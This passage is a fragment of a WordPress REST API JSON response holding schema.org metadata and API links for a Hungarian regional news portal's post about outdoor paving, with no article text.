perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g","datePublished":"2025-06-16T09:04:46+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/"},"wordCount":878,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-0.jpg","keywords":["k\u00fclt\u00e9ri burkolat"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/","name":"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-0.jpg","datePublished":"2025-06-16T09:04:46+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-0.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/06\/kulteri-burkolat-0.jpg","width":604,"height":429},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/06\/16\/kulteri-burkolat-stilus-es-tartossag\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"K\u00fclt\u00e9ri burkolat: st\u00edlus \u00e9s tart\u00f3ss\u00e1g"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/71951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=71951"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/71951\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media\/71953"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=71951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=71951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=71951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}